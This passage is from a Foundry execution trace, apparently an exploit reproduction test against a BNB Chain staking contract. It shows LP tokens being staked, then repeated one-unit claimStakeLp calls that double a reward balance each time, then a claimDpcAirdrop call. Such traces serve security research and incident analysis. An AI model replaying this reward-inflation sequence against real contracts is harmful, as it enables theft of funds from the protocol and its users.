    │   │   │   @ 60: 0x0000000000000000000000000000000000000000000000080e68ea54a5d1d2ee → 0x0000000000000000000000000000000000000000000000081266a73b70c5d267
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000001225dab448fbf59e4 → 0x0000000000000000000000000000000000000000000000005acec630ec17742e
    │   │   └─ ← [Return] true
    │   ├─ [79659] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   │   ├─ [1959] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   │   └─ ← [Return] 8242212301889392797719 [8.242e21]
    │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 31414125373459180 [3.141e16])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 48720538302956672656 [4.872e19])
    │   │   ├─ emit Sync(reserve0: 107881728058171197363253 [1.078e23], reserve1: 8242212301889392797719 [8.242e21])
    │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 188198220600612680155 [1.881e20], amount1: 13660698406115731206 [1.366e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000002a4221f743d8b9690
    │   │   │   @ 0: 0x000000000000000000000000000000000000000000000636e5eefde8928a73cb → 0x0000000000000000000000000000000000000000000006398a80b857d7e69547
    │   │   │   @ 8: 0x631b164b0000000001be1217d6a217a901110000000016ce13f4927ec5ef225a → 0x631b164b0000000001becfac6374bfeee8170000000016d847baf703ba0e1435
    │   │   │   @ 11: 0x0000000000000000000000000027bc91f4eb62a176de768472bbb009ff245780 → 0x0000000000000000000000000027df553beac6b69c0533537dbcb320cdd9d8c3
    │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x0000000000000000000000000000000000000000000000009231686c17579b10 → 0x00000000000000000000000000000000000000000000000092a103671f2825fc
    │   │   └─ ← [Return] 48720538302956672656 [4.872e19]
    │   └─ ← [Return] 188198220600612680155 [1.881e20], 14379682532753401270 [1.437e19], 48720538302956672656 [4.872e19]
    ├─ [537] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   └─ ← [Return] 48720538302956672656 [4.872e19]
    ├─ [66328] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::stakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 48720538302956672656 [4.872e19])
    │   ├─ [655] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE) [staticcall]
    │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   ├─ [8376] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, 48720538302956672656 [4.872e19])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, value: 48720538302956672656 [4.872e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000002a4221f743d8b9690 → 0
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000007f54e949bb9c258000 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11690
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 76: 0x00000000000000000000000000000000000000000000007f54e949bb9c258000 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11690
    │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x00000000000000000000000000000000000000000000007f54e949bb9c258000 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11690
    │   │   @ 0x9115a1d3aa9eaab1bdadc9397d1d01051a62ec1211a80b9c76a523c24e2a3ec7: 0 → 0x00000000000000000000000000000000000000000000000000000000631b86cb
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0 → 0x000000000000000000000000000000000000000000000002a4221f743d8b9690
    │   └─ ← [Stop]
    ├─ [0] VM::warp(1662805963 [1.662e9])
    │   └─ ← [Return]
    ├─ [69120] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [23203] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b11690 → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168f
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 1
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b9690 → 0x000000000000000000000000000000000000000000000002a4221f743d8b968f
    │   │   @ 39: 0x00000000000000000000000000000000000000000000000000000000631b86cb → 0x00000000000000000000000000000000000000000000000000000000631cd84b
    │   │   @ 0x9115a1d3aa9eaab1bdadc9397d1d01051a62ec1211a80b9c76a523c24e2a3ec7: 0x00000000000000000000000000000000000000000000000000000000631b86cb → 0x00000000000000000000000000000000000000000000000000000000631cd84b
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b11690 → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168f
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 1
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0 → 0x0000000000000000000000000000000000000000000000000f2a9aa012768280
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168f → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168e
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 1 → 2
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 1 → 2
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168f → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168e
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x0000000000000000000000000000000000000000000000000f2a9aa012768280 → 0x0000000000000000000000000000000000000000000000001e55354024ed0500
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968f → 0x000000000000000000000000000000000000000000000002a4221f743d8b968e
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168e → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168d
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 2 → 3
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968e → 0x000000000000000000000000000000000000000000000002a4221f743d8b968d
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168e → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168d
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 2 → 3
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x0000000000000000000000000000000000000000000000001e55354024ed0500 → 0x0000000000000000000000000000000000000000000000003caa6a8049da0a00
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 3 → 4
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168d → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168c
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x0000000000000000000000000000000000000000000000003caa6a8049da0a00 → 0x0000000000000000000000000000000000000000000000007954d50093b41400
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168d → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168c
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 3 → 4
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968d → 0x000000000000000000000000000000000000000000000002a4221f743d8b968c
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168c → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168b
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 4 → 5
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968c → 0x000000000000000000000000000000000000000000000002a4221f743d8b968b
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 4 → 5
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168c → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168b
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x0000000000000000000000000000000000000000000000007954d50093b41400 → 0x000000000000000000000000000000000000000000000000f2a9aa0127682800
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168b → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168a
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 5 → 6
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x000000000000000000000000000000000000000000000000f2a9aa0127682800 → 0x000000000000000000000000000000000000000000000001e55354024ed05000
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 5 → 6
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168b → 0x000000000000000000000000000000000000000000000081f90b692fd9b1168a
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968b → 0x000000000000000000000000000000000000000000000002a4221f743d8b968a
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 6 → 7
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168a → 0x000000000000000000000000000000000000000000000081f90b692fd9b11689
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 6 → 7
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b968a → 0x000000000000000000000000000000000000000000000002a4221f743d8b9689
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x000000000000000000000000000000000000000000000001e55354024ed05000 → 0x000000000000000000000000000000000000000000000003caa6a8049da0a000
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b1168a → 0x000000000000000000000000000000000000000000000081f90b692fd9b11689
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b11689 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11688
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 7 → 8
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x000000000000000000000000000000000000000000000003caa6a8049da0a000 → 0x000000000000000000000000000000000000000000000007954d50093b414000
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b9689 → 0x000000000000000000000000000000000000000000000002a4221f743d8b9688
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 7 → 8
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b11689 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11688
    │   └─ ← [Stop]
    ├─ [20354] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimStakeLp(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   ├─ [3303] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ emit Transfer(from: 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb6dce3adf355cf582e0092cd9712712812666252f651c76c6e04cc921fc547e3: 0x000000000000000000000000000000000000000000000081f90b692fd9b11688 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11687
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 8 → 9
    │   │   └─ ← [Return] true
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─  storage changes:
    │   │   @ 0xc658420c44ba651d30b2a7367479d70183a0f7bbcbe7531ac9fdd0bdc6e60831: 0x000000000000000000000000000000000000000000000002a4221f743d8b9688 → 0x000000000000000000000000000000000000000000000002a4221f743d8b9687
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 8 → 9
    │   │   @ 76: 0x000000000000000000000000000000000000000000000081f90b692fd9b11688 → 0x000000000000000000000000000000000000000000000081f90b692fd9b11687
    │   │   @ 0x3386a42d42bcdf15a01409ef82b398361fdc8262391f6935b9f4b7f552f743e6: 0x000000000000000000000000000000000000000000000007954d50093b414000 → 0x00000000000000000000000000000000000000000000000f2a9aa01276828000
    │   └─ ← [Stop]
    ├─ [40411] 0xB75cA3C3e99747d0e2F6e75A9fBD17F5Ac03cebE::claimDpcAirdrop(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [439] 0x79cD24Ed4524373aF6e047556018b1440CF04be3::totalSupply() [staticcall]
    │   │   └─ ← [Return] 29395643488880992621895 [2.939e22]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x79cD24Ed4524373aF6e047556018b1440CF04be3) [staticcall]
    │   │   └─ ← [Return] 107881728058171197363253 [1.078e23]
